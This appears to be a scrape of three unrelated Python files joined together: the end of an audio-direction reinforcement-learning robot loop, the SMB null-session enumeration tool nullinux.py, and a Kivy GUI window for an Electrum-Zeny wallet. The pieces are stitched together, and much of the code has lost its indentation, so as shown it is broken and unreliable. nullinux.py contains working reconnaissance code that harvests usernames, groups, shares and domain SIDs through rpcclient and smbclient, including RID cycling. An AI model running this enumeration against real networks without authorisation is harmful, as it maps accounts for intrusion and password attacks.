# denoised_norm_dir = os.path.join(WAV_PATH, self.save_dir_name, 'norm_del_denoised_norm_signal')
# self.save_multi_channel_audio(denoised_norm_dir, denoised_norm_signals, fs=SAMPLE_RATE, norm=True, )
seg_denoised_signals = np.array(
[audio_segmenter_4_numpy(signal, segment_len=self.seg_para['time_len'],
overlap_per=self.seg_para['overlap_per'], fs=SAMPLE_RATE, dropout=False, )
for signal in denoised_norm_signals])
seg_denoised_signals = seg_denoised_signals.transpose(1, 0, 2) # deg_idx * channel * samplepoint
audio_segments, drop_flag = self.drop_audio_clips(signal_segments=seg_denoised_signals)
norm_audio_segments = self.norm_batch_audio_to_target_level(audio_segments)
return norm_audio_segments, drop_flag
def loop(self, event, control, source='test'):
# self.init_micro_mapping()
# initialize models
# map = Map()
# gccGenerator = GccGenerator()
# actor = Actor(GCC_BIAS, ACTION_SPACE, lr=0.004)
# critic = Critic(GCC_BIAS, ACTION_SPACE, lr=0.003, gamma=0.95)
# actor.load_trained_model(MODEL_PATH)
# set parameters
# num_saved_sig = 1
# fixme, set start position
# map.walker_pos_x = 1.3
# map.walker_pos_z = 3.3
# map.walker_face_to = 0
# 1.0, 1.85, 0
# -3.1, 0.9, 90
# -2.1, 0.9, 90
# init at the first step
# state_last = None
# action_last = None
# direction_last = None
# steps
while True:
event.wait()
# print('num_saved_sig: ', int(num_saved_sig))
# map.print_walker_status()
# map.detect_which_region()
# final_file = None
# Record
# # todo, congest here for kws
# if num_saved_sig == 0:
# print("congest in KWS ...")
# self.KWS.slide_win_loop()
# wakeup_wav = self.KWS.RANDOM_PREFIX + "win.wav"
#
# denoised_sig_fname = str(num_saved_sig) + "_de.wav"
#
# de_noise(os.path.join(self.KWS.WAV_PATH, wakeup_wav),
# os.path.join(self.KWS.WAV_PATH, denoised_sig_fname))
#
# if self.denoise is False:
# final_file = wakeup_wav
# else:
# final_file = denoised_sig_fname
#
# else:
# # active detection
# print("start monitoring ... ")
# while True:
# event.wait()
# # print("start monitoring ... ")
# frames = self.monitor_from_4mics()
#
# # store the signal
# file_name = os.path.join(WAV_PATH, str(num_saved_sig) + ".wav")
# self.savewav(file_name, frames)
#
# # de-noise the signal into new file, then VAD and split
# denoised_sig_fname = str(num_saved_sig) + '_denoised.wav'
# de_noise(os.path.join(WAV_PATH, ini_sig_fname), os.path.join(WAV_PATH, denoised_sig_fname))
#
# # if exceed, break, split to process, then action. After action done, begin monitor
#
# if self.de is False:
# final_file = ini_sig_fname
# else:
# final_file = denoised_sig_fname
#
# if judge_active(os.path.join(WAV_PATH, final_file)):
# print("Detected ... ")
# break
#
# Split
''''''
# produce action
"""
use four mic file to be input to produce action
"""
if self.debug:
self.save_dir_name = 'self_collected'
ini_dir = os.path.join(WAV_PATH, self.save_dir_name, 'ini_signal')
ini_signals = self.read_multi_channel_audio(ini_dir, num_channel=CHANNELS)
else:
self.save_dir_name = 'test'
frames = self.monitor_from_4mics()
ini_signals = self.split_channels_from_frames(frames=frames, num_channel=CHANNELS, mapping_flag=True)
ini_dir = os.path.join(WAV_PATH, self.save_dir_name, 'ini_signal')
self.save_multi_channel_audio(ini_dir, ini_signals, fs=SAMPLE_RATE, norm=False, )
# norm_dir = os.path.join(WAV_PATH, 'test', 'norm_signal')
# self.save_multi_channel_audio(norm_dir, ini_signals, fs=SAMPLE_RATE, norm=True, )
audio_segments, drop_flag = self.preprocess_ini_signal(ini_signals)
# print('Number of preprocessed audio segments: ', len(audio_segments))
direction = None
if len(audio_segments) > 0:
gcc_feature_batch = self.doa.extract_gcc_phat_4_batch(audio_segments)
# length=len(gcc_feature_batch)
gcc_feature = np.mean(gcc_feature_batch, axis=0)
self.ac.state_ = gcc_feature
# # detect invalid direction
# invalids_dire = map.detect_invalid_directions()
# print("invalids_dire of walker: ", invalids_dire)
# invalids_idx = [(i + 45) % 360 / 45 for i in invalids_dire]
# direction_prob, direction_cate, = self.doa.predict([gcc_feature], invalid_classes=None)
direction_prob, direction, = self.ac.predict(state=gcc_feature, invalid_classes=None)
direction = direction[0]
# print(direction_prob)
# print(direction_cate)
# direction = stats.mode(direction_cate)[0][0] * 45
print("producing action ...\n", 'Direction', direction)
SSLturning(control, direction * 45)
# control.speed = STEP_SIZE / FORWARD_SECONDS
# control.radius = 0
# control.omega = 0
# time.sleep(FORWARD_SECONDS)
# control.speed = 0
# print("movement done.")
self.ac.state_ = gcc_feature
self.ac.action_ = direction
# set reward
while True:
try:
reward = int(input('Please input reward:'))
except:
continue
else:
break
self.ac.learn(self.ac.state, self.ac.state_, reward)
                # maintain the state variables
self.ac.state = self.ac.state_
self.ac.action = self.ac.action_
self.ac.reward = reward
self.ac.reward_sum += reward
#
# print('Wait ~ ')
if __name__ == '__main__':
# os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
ssl = SSL(denoise=True, seg_len='256ms', debug=False)
# cd = CD.ControlDriver(left_right=0)
cd = ''
temp = threading.Event()
temp.set()
# p2 = threading.Thread(target=cd.control_part, args=())
p1 = threading.Thread(target=ssl.loop, args=(temp, cd,))
# p2.start()
p1.start()
|
nullinux.py
|
#!/usr/bin/env python3
# Author: @m8r0wn
# License: GPL-3.0
# Python2/3 compatibility for print('', end='')
from __future__ import print_function
import sys
import argparse
import datetime
from time import sleep
from ipparser import ipparser
from threading import Thread, activeCount
if sys.version_info[0] < 3:
from commands import getoutput
else:
from subprocess import getoutput
class nullinux():
known_users = ['Administrator', 'Guest', 'krbtgt', 'root', 'bin']
domain_sid = ""
acquired_users = []
def __init__(self, username, password, verbose):
self.group_count = 0
self.username = username
self.password = password
self.verbose = verbose
def enum_os(self, target):
cmd = "smbclient //{}/IPC$ -U {}%{} -t 1 -c exit".format(target,self.username, self.password)
for line in getoutput(cmd).splitlines():
if "Domain=" in line:
print_success("{}: {}".format(target, line))
elif "NT_STATUS_LOGON_FAILURE" in line:
print_failure("{}: Authentication Failed".format(target))
def get_dom_sid(self, target):
print("\n\033[1;34m[*]\033[1;m Enumerating Domain Information for: {}".format(target))
cmd = "rpcclient -c lsaquery -U {}%{} {}".format(self.username, self.password, target)
for line in getoutput(cmd).splitlines():
if "Domain Name:" in line:
print_success(line)
elif "Domain Sid:" in line:
self.domain_sid = line.split(":")[1].strip()
print_success("Domain SID: {}".format(self.domain_sid))
if not self.domain_sid:
print_failure("Could not attain Domain SID")
    def create_userfile(self):
        # write one acquired user per line
        with open('nullinux_users.txt', 'w') as openfile:
            openfile.write('\n'.join(self.acquired_users))
def enum_shares(self, target):
count = 0
acquired_shares = []
smbclient_types = ['Disk', 'IPC', 'Printer']
print("\n\033[1;34m[*]\033[1;m Enumerating Shares for: {}".format(target))
cmd = "smbclient -L {} -U {}%{} -t 2".format(target, self.username, self.password)
for line in getoutput(cmd).splitlines():
if count == 0: #Print Enum Share Heading
print(" {:26} {}".format("Shares", "Comments"))
print(" " + "-" * 43)
count += 1
for t in smbclient_types: #Check if output in known share types
if t in line:
try:
                        if 'IPC$' in line:
                            print(" \\\\{}\\{}".format(target, "IPC$"))
                            acquired_shares.append("IPC$")
                        else:
                            share = line.split(t)[0].strip()
                            comment = line.split(t)[1].strip()
                            print(" \\\\{}\\{:15} {}".format(target, share, comment))
                            acquired_shares.append(share)
except KeyboardInterrupt:
print("\n[!] Key Event Detected...\n\n")
sys.exit(0)
except:
pass
if acquired_shares:
#Enumerate dir of each new share
for s in acquired_shares:
self.enum_dir(target, s)
else:
print(" ")
print_failure("No Shares Detected")
def share_header(self, target, share):
print("\n ", end='')
print_status("Enumerating: \\\%s\%s" % (target, share))
def enum_dir(self, target, share):
header_count = 0
cmd = "smbclient //{}/\'{}\' -t 3 -U {}%{} -c dir".format(target, share, self.username, self.password)
for line in getoutput(cmd).splitlines():
if "NT_STATUS" in line or "_ACCESS_DENIED" in line:
if self.verbose:
if header_count == 0:
header_count += 1
self.share_header(target, share)
print(" ", end='')
print_failure(line)
elif "Domain=" in line or "blocks available" in line or "WARNING" in line or "failed:" in line or not line:
pass
else:
if header_count == 0:
header_count += 1
self.share_header(target, share)
print(" "+line)
def enum_querydispinfo(self, target):
print("\n\033[1;34m[*]\033[1;m Enumerating querydispinfo for: {}".format(target))
cmd = "rpcclient -c querydispinfo -U {}%{} {}".format(self.username, self.password, target)
for line in getoutput(cmd).splitlines():
try:
user_account = line.split("Name:")[0].split("Account:")[1].strip()
print(" " + user_account)
if user_account not in self.acquired_users:
self.acquired_users.append(user_account)
except KeyboardInterrupt:
print("\n[!] Key Event Detected...\n\n")
sys.exit(0)
except:
pass
def enum_enumdomusers(self, target):
print("\n\033[1;34m[*]\033[1;m Enumerating enumdomusers for: {}".format(target))
cmd = "rpcclient -c enumdomusers -U {}%{} {}".format(self.username, self.password, target)
for line in getoutput(cmd).splitlines():
try:
user_account = line.split("[")[1].split("]")[0].strip()
print(" "+user_account)
if user_account not in self.acquired_users:
self.acquired_users.append(user_account)
except KeyboardInterrupt:
print("\n[!] Key Event Detected...\n\n")
sys.exit(0)
except:
pass
def enum_lsa(self, target):
print("\n\033[1;34m[*]\033[1;m Enumerating LSA for: {}".format(target))
cmd = "rpcclient -c lsaenumsid -U {}%{} {}".format(self.username, self.password, target)
output = getoutput(cmd)
for line in output.splitlines():
try:
if "S-1-5-21" in line:
user_sid = "rpcclient -c 'lookupsids {}' -U {}%{} {}".format(line, self.username, self.password, target)
for x in getoutput(user_sid).splitlines():
user_account = x.split("\\")[1].split("(")[0].strip()
count = int(x.split("(")[1].split(")")[0].strip())
if count == 1:
if self.verbose:
print(" "+x)
else:
print(" "+user_account)
if user_account not in self.acquired_users:
self.acquired_users.append(user_account)
                        elif count > 1 and "*unknown*\\*unknown*" not in x:
                            if self.verbose:
                                print(" {:35} (Network/Local Group)".format(x))
                            else:
                                print(" {:35} (Network/Local Group)".format(user_account))
except KeyboardInterrupt:
print("\n[!] Key Event Detected...\n\n")
sys.exit(0)
except:
pass
def rid_cycling(self, target, ridrange, max_threads):
print("\n\033[1;34m[*]\033[1;m Performing RID Cycling for: {}".format(target))
if not self.domain_sid:
print_failure("RID Failed: Could not attain Domain SID")
return False
# Handle custom RID range input
try:
r = ridrange.split("-")
rid_range = list(range(int(r[0]), int(r[1])+1))
except:
print_failure("Error parsing custom RID range, reverting to default")
rid_range = list(range(500, 531))
for rid in rid_range:
try:
Thread(target=self.rid_thread, args=(rid,target,), daemon=True).start()
except:
pass
while activeCount() > max_threads:
sleep(0.001)
# Exit all threads before returning
while activeCount() > 1:
sleep(0.001)
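    # Note (illustrative): the two activeCount() loops above form a simple
    # throttle -- spawn until max_threads are alive, then spin, and finally
    # drain back to one thread before returning. A ThreadPoolExecutor sketch
    # of the same idea (an assumption, not how nullinux is written):
    #
    #     from concurrent.futures import ThreadPoolExecutor
    #     with ThreadPoolExecutor(max_workers=max_threads) as pool:
    #         for rid in rid_range:
    #             pool.submit(self.rid_thread, rid, target)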
def rid_thread(self, rid, target):
cmd = "rpcclient -c \"lookupsids {}-{}\" -U {}%{} {}".format(self.domain_sid, rid, self.username, self.password,target)
for line in getoutput(cmd).splitlines():
if "S-1-5-21" in line:
# Split output to get username/group name
user_account = line.split("\\")[1].split("(")[0].strip()
count = int(line.split("(")[1].split(")")[0].strip())
if count == 1:
if self.verbose:
print(" " + line)
else:
print(" " + user_account)
if user_account not in self.acquired_users:
self.acquired_users.append(user_account)
                elif count > 1 and "*unknown*\\*unknown*" not in line:
if self.verbose:
print(" {:35} (Network/LocalGroup)".format(line))
else:
print(" {:35} (Network/LocalGroup)".format(user_account))
def enum_known_users(self, target):
print("\n\033[1;34m[*]\033[1;m Testing {} for Known Users".format(target))
for user in self.known_users:
cmd = "rpcclient -c \"lookupnames {}\" -U {}%{} {}".format(user, self.username, self.password, target)
for line in getoutput(cmd).splitlines():
if "S-1-5" in line:
try:
user_account = line.split(" ")[0].strip()
if self.verbose:
print(" " + line)
else:
print(" " + user_account)
                        if user_account not in self.acquired_users and int(line.split("User:")[1].replace(")", "").strip()) == 1:
self.acquired_users.append(user_account)
except KeyboardInterrupt:
print("\n[!] Key Event Detected...\n\n")
sys.exit(0)
except:
pass
def enum_dom_groups(self, target):
print("\n\033[1;34m[*]\033[1;m Enumerating Group Memberships for: {}".format(target))
cmd = "rpcclient -c enumdomgroups -U {}%{} {}".format(self.username, self.password, target)
for line in getoutput(cmd).splitlines():
if "rid:" in line:
try:
group = line.split("[")[1].split("]")[0].strip()
print_success("Group: %s" % (group))
self.group_count += 1
self.enum_group_mem(target, group)
except KeyboardInterrupt:
print("\n[!] Key Event Detected...\n\n")
sys.exit(0)
except:
pass
def enum_group_mem(self, target, group):
cmd = "net rpc group members \'{}\' -U {}%{} -I {}".format(group, self.username, self.password, target)
for line in getoutput(cmd).splitlines():
try:
user_account = line.split("\\")[1].strip()
print(" " + user_account)
if user_account not in self.acquired_users:
self.acquired_users.append(user_account)
except KeyboardInterrupt:
print("\n[!] Key Event Detected...\n\n")
sys.exit(0)
except:
pass
def print_success(msg):
print('\033[1;32m[+] \033[1;m'+msg)
def print_status(msg):
print('\033[1;34m[*] \033[1;m'+msg)
def print_failure(msg):
print('\033[1;31m[-] \033[1;m'+msg)
def time_stamp():
return datetime.datetime.now().strftime('%m-%d-%Y %H:%M')
def main(args):
try:
print("\n Starting nullinux v{} | {}\n\n".format(version, time_stamp()))
for t in args.target:
#enum os
scan = nullinux('\"{}\"'.format(args.username), '\"{}\"'.format(args.password), args.verbose)
scan.enum_os(t)
#enum shares
if args.shares or args.all:
scan.enum_shares(t)
#enum users
if args.users or args.all:
if not scan.domain_sid:
scan.get_dom_sid(t)
scan.enum_querydispinfo(t)
scan.enum_enumdomusers(t)
#bypass on quick option
if not args.quick:
scan.enum_lsa(t)
scan.rid_cycling(t, args.rid_range, args.max_threads)
scan.enum_known_users(t)
scan.enum_dom_groups(t)
#if users, write to file, close
if scan.acquired_users:
print("\n\033[1;32m[+]\033[1;m {} USER(s) identified in {} GROUP(s)".format(len(scan.acquired_users), scan.group_count))
print("\033[1;34m[*]\033[1;m Writing users to file: ./nullinux_users.txt\n")
scan.create_userfile()
else:
print("\n\033[1;31m[-]\033[1;m No valid users or groups detected\n")
except Exception as e:
print("\n[*] Main Error: {}\n\n".format(e))
if __name__ == '__main__':
try:
version = '5.3.2'
args = argparse.ArgumentParser(description=("""
nullinux | v{0}
-----------------------------------
SMB null-session enumeration tool to gather OS,
user, share, and domain information.
usage:
python3 nullinux.py -users -quick DC1.Domain.net
python3 nullinux.py -all -r 500-600 192.168.0.0-5
python3 nullinux.py -shares -U 'Domain\\User' -P 'Password1' 10.0.0.1,10.0.0.5""").format(version), formatter_class=argparse.RawTextHelpFormatter, usage=argparse.SUPPRESS)
args.add_argument('-u', '-U', dest='username', type=str, default="", help='Username')
args.add_argument('-p', '-P', dest='password', type=str, default="", help='Password')
args.add_argument('-v', dest="verbose", action='store_true', help="Verbose output")
args.add_argument('-shares', dest="shares", action='store_true', help="Enumerate shares")
args.add_argument('-users', dest="users", action='store_true', help="Enumerate users")
args.add_argument('-a', '-all', dest="all", action='store_true', help="Enumerate shares & users")
args.add_argument('-q', '-quick', dest="quick", action='store_true', help="Fast user enumeration (use with -users or -all)")
args.add_argument('-r', dest='rid_range', type=str, default="500-530", help='Set Custom RID cycling range (Default: 500-530)')
args.add_argument('-t', dest='max_threads', type=int, default=5, help='Max threads for RID cycling (Default: 5)')
args.add_argument(dest='target', nargs='+', help='Target server')
args = args.parse_args()
args.target = ipparser(args.target[0])
#Start Main
main(args)
except KeyboardInterrupt:
print("\n[!] Key Event Detected...\n\n")
sys.exit(0)
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import electrum_zeny as electrum
from electrum_zeny.bitcoin import TYPE_ADDRESS
from electrum_zeny import WalletStorage, Wallet
from electrum_zeny_gui.kivy.i18n import _
from electrum_zeny.paymentrequest import InvoiceStore
from electrum_zeny.util import profiler, InvalidPassword
from electrum_zeny.plugins import run_hook
from electrum_zeny.util import format_satoshis, format_satoshis_plain
from electrum_zeny.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble
from .uix.dialogs import OutputList, OutputItem
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
util = False
# register a widget cache to keep memory use down; the timeout is set so
# the data is cached forever
Cache.register('electrum_zeny_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_zeny_gui.kivy.uix.screens')
# Register fonts; without this you won't be able to use bold/italic
# inside markup.
from kivy.core.text import Label
Label.register('Roboto',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf',
'gui/kivy/data/fonts/Roboto-Bold.ttf')
from electrum_zeny.util import base_units
class ElectrumWindow(App):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
blockchain_checkpoint = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
host, port, protocol, proxy, auto_connect = self.network.get_parameters()
self.network.set_parameters(host, port, protocol, proxy, self.auto_connect)
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
def choose_server_dialog(self, popup):
from .uix.dialogs.choice_dialog import ChoiceDialog
protocol = 's'
def cb2(host):
from electrum_zeny.network import DEFAULT_PORTS
pp = servers.get(host, DEFAULT_PORTS)
port = pp.get(protocol, '')
popup.ids.host.text = host
popup.ids.port.text = port
servers = self.network.get_servers()
ChoiceDialog(_('Choose a server'), sorted(servers), popup.ids.host.text, cb2).open()
def choose_blockchain_dialog(self, dt):
from .uix.dialogs.choice_dialog import ChoiceDialog
chains = self.network.get_blockchains()
def cb(name):
for index, b in self.network.blockchains.items():
if name == self.network.get_blockchain_name(b):
self.network.follow_chain(index)
#self.block
names = [self.network.blockchains[b].get_name() for b in chains]
if len(names) >1:
ChoiceDialog(_('Choose your chain'), names, '', cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
self.electrum_config.set_key('use_change', self.use_change, True)
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
def set_URI(self, uri):
self.switch_to('send')
self.send_screen.set_URI(uri)
def on_new_intent(self, intent):
if intent.getScheme() != 'bitcoin':
return
uri = intent.getDataString()
self.set_URI(uri)
def on_language(self, instance, language):
Logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
Logger.info("on_quotes")
self._trigger_update_history()
def on_history(self, d):
Logger.info("on_history")
self._trigger_update_history()
def _get_bu(self):
return self.electrum_config.get('base_unit', 'mBTC')
def _set_bu(self, value):
assert value in base_units.keys()
self.electrum_config.set_key('base_unit', value, True)
self._trigger_update_status()
self._trigger_update_history()
base_unit = AliasProperty(_get_bu, _set_bu)
status = StringProperty('')
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return base_units[self.base_unit]
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
rate = self.fx.exchange_rate()
if not rate:
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if not rate:
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, self.decimal_point())
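    # Worked example (illustrative; assumes electrum's usual mapping of
    # 'mBTC' to 5 decimal places): with an exchange rate of 100.0,
    # fiat_to_btc('1') computes int(1e8 * 1 / 100) = 1000000 satoshis,
    # which format_satoshis_plain renders as '10' mBTC.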
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
    '''Screen orientation, ascertained from the window size.
    Can be one of `landscape` or `portrait`.
    :data:`orientation` is a read-only `AliasProperty`. Defaults to 'landscape'.
    '''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
    '''Tries to ascertain the kind of device the app is running on.
    Can be one of `tablet` or `phone`.
    :data:`ui_mode` is a read-only `AliasProperty`. Defaults to 'phone'.
    '''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None
App.__init__(self)#, **kwargs)
title = _('Electrum-MONA App')
self.electrum_config = config = kwargs.get('config', None)
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None)
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
host, port, protocol, proxy_config, auto_connect = self.network.get_parameters()
self.server_host = host
self.server_port = port
self.auto_connect = auto_connect
self.proxy_config = proxy_config if proxy_config else {}
self.plugins = kwargs.get('plugins', [])
self.gui_object = kwargs.get('gui_object', None)
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', False)
self.use_change = config.get('use_change', True)
self.use_unconfirmed = not config.get('confirmed_only', False)
        # create triggers so that UI refreshes fire at most twice a second
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
# cached dialogs
self._settings_dialog = None
self._password_dialog = None
def wallet_name(self):
return os.path.basename(self.wallet.storage.path) if self.wallet else ' '
def on_pr(self, pr):
if pr.verify(self.wallet.contacts):
key = self.wallet.invoices.add(pr)
if self.invoices_screen:
self.invoices_screen.update()
status = self.wallet.invoices.get_status(key)
if status == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
else:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum_zeny.bitcoin import base_decode, is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.startswith('bitzeny:'):
self.set_URI(data)
return
# try to decode transaction
from electrum_zeny.transaction import Transaction
from electrum_zeny.util import bh2u
try:
text = bh2u(base_decode(data, None, base=43))
tx = Transaction(text)
tx.deserialize()
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for tab in ['invoices', 'send', 'history', 'receive', 'requests']:
self.update_tab(tab)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
if s is None:
s = self.tabs.ids[name + '_screen']
s.load_screen()
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, addr):
self.switch_to('receive')
self.receive_screen.screen.address = addr
def show_pr_details(self, req, status, is_invoice):
from electrum_zeny.util import format_time
requestor = req.get('requestor')
exp = req.get('exp')
memo = req.get('memo')
amount = req.get('amount')
popup = Builder.load_file('gui/kivy/uix/ui_screens/invoice.kv')
popup.is_invoice = is_invoice
popup.amount = amount
popup.requestor = requestor if is_invoice else req.get('address')
popup.exp = format_time(exp) if exp else ''
popup.description = memo if memo else ''
popup.signature = req.get('signature', '')
popup.status = status
txid = req.get('txid')
popup.tx_hash = txid or ''
popup.on_open = lambda: popup.ids.output_list.update(req.get('outputs', []))
popup.open()
def qr_dialog(self, title, data, show_text=False):
from .uix.dialogs.qr_dialog import QRDialog
popup = QRDialog(title, data, show_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return
from jnius import autoclass
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
Intent = autoclass('android.content.Intent')
intent = Intent("com.google.zxing.client.android.SCAN")
intent.putExtra("SCAN_MODE", "QR_CODE_MODE")
def on_qr_result(requestCode, resultCode, intent):
if requestCode == 0:
if resultCode == -1: # RESULT_OK:
contents = intent.getStringExtra("SCAN_RESULT")
if intent.getStringExtra("SCAN_RESULT_FORMAT") == 'QR_CODE':
on_complete(contents)
else:
self.show_error("wrong format " + intent.getStringExtra("SCAN_RESULT_FORMAT"))
activity.bind(on_activity_result=on_qr_result)
try:
PythonActivity.mActivity.startActivityForResult(intent, 0)
except:
self.show_error(_('Could not start Barcode Scanner.') + ' ' + _('Please install the Barcode Scanner app from ZXing'))
def scan_qr_zxing(self, on_complete):
# uses zxing embedded lib
if platform != 'android':
return
from jnius import autoclass
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
IntentIntegrator = autoclass('com.google.zxing.integration.android.IntentIntegrator')
integrator = IntentIntegrator(PythonActivity.mActivity)
def on_qr_result(requestCode, resultCode, intent):
if requestCode == 0:
if resultCode == -1: # RESULT_OK:
contents = intent.getStringExtra("SCAN_RESULT")
if intent.getStringExtra("SCAN_RESULT_FORMAT") == 'QR_CODE':
on_complete(contents)
else:
self.show_error("wrong format " + intent.getStringExtra("SCAN_RESULT_FORMAT"))
activity.bind(on_activity_result=on_qr_result)
integrator.initiateScan()
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file('gui/kivy/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
Logger.info('Time to on_start: {} <<<<<<<<'.format(time.clock()))
win = Window
win.bind(size=self.on_size, on_keyboard=self.on_keyboard)
win.bind(on_key_down=self.on_key_down)
#win.softinput_mode = 'below_target'
self.on_size(win, win.size)
self.init_ui()
self.load_wallet_by_name(self.electrum_config.get_wallet_path())
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitzeny: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['updated', 'status', 'new_transaction', 'verified', 'interfaces']
self.network.register_callback(self.on_network_event, interests)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_complete(self, instance, wallet):
if wallet:
wallet.start_threads(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
self.on_resume()
def load_wallet_by_name(self, path):
if not path:
return
wallet = self.daemon.load_wallet(path, None)
if wallet:
if wallet != self.wallet:
self.stop_wallet()
self.load_wallet(wallet)
self.on_resume()
else:
Logger.debug('Electrum: Wallet not found. Launching install wizard')
storage = WalletStorage(path)
wizard = Factory.InstallWizard(self.electrum_config, storage)
wizard.bind(on_wizard_complete=self.on_wizard_complete)
action = wizard.storage.get_action()
wizard.run(action)
def on_stop(self):
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_key_down(self, instance, key, keycode, codepoint, modifiers):
if 'ctrl' in modifiers:
# q=24 w=25
if keycode in (24, 25):
self.stop()
elif keycode == 27:
# r=27
# force update wallet
self.update_wallet()
elif keycode == 112:
# pageup
#TODO move to next tab
pass
elif keycode == 117:
# pagedown
#TODO move to prev tab
pass
#TODO: alt+tab_number to activate the particular tab
